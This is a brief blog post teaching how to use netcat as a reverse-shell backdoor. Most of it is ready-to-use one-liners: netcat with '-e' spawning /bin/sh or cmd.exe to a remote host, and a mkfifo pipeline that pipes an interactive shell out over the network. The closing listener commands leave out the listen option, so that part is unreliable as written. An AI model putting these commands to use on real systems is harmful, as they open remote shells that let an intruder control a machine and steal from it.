Jeet Kune Crypto: netcat (reverse shells)
One of the most useful TCP/IP tools, for network and systems engineers, is netcat. Netcat is commonly referred to as the “TCP/IP Swiss Army Knife”. It is often flagged as malware or a “potentially unwanted program” by anti-malware software.
While traditional backdoors wait for you to connect (which netcat can also do). Here are a few ways that you can use it as a “reverse shell”, or a backdoor that connects back to you:
Versions that support "-e":
Linux:
nc -e "/bin/sh" <target> <target port>
Windows:
nc -e "cmd.exe" <target> <target port>
If the version of netcat that you’re using does not support “-e”, you’ll want to create a network socket out of a file. You can “hack” up a network socket on linux, like so:
mkfifo /tmp/socket;cat /tmp/socket|/bin/sh -i 2>&1|nc <target> <target port> > /tmp/socket
If you’re using netcat to listen for the incoming connection, you’d prepare to receive this type of connection like so:
nc <host> <port>
or for a range of ports
nc <host> <starting port>-<ending port>